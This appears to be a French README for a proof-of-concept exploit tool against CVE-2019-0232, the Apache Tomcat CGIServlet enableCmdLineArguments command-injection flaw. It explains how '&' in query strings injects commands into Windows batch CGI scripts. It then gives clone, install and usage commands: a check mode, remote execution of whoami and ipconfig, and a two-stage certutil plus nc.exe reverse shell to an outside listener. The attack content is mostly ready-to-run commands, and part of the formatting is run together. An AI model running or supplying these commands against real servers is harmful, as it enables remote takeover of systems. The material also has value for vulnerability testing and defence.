
CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

Apache Tomcat CGIServlet enableCmdLineArguments RCE
Injection de script batch Windows via les arguments de la chaîne de requête
Apache Tomcat avec le servlet CGI activé et enableCmdLineArguments=true transmet les paramètres de la chaîne de requête comme arguments de ligne de commande aux scripts CGI. Sous Windows, les fichiers batch (.bat/.cmd) interprètent & comme un séparateur de commandes, permettant l'exécution arbitraire de commandes via une URL malveillante.
conf/web.xml ou WEB-INF/web.xmlenableCmdLineArguments=true dans les paramètres d'initialisation du servlet CGIism.bat) déployé et accessible&)git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt
Vérifier si le point de terminaison CGI existe :
python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat
Exécuter une commande :
python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'
Reverse shell (2 étapes certutil + nc.exe) :
python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444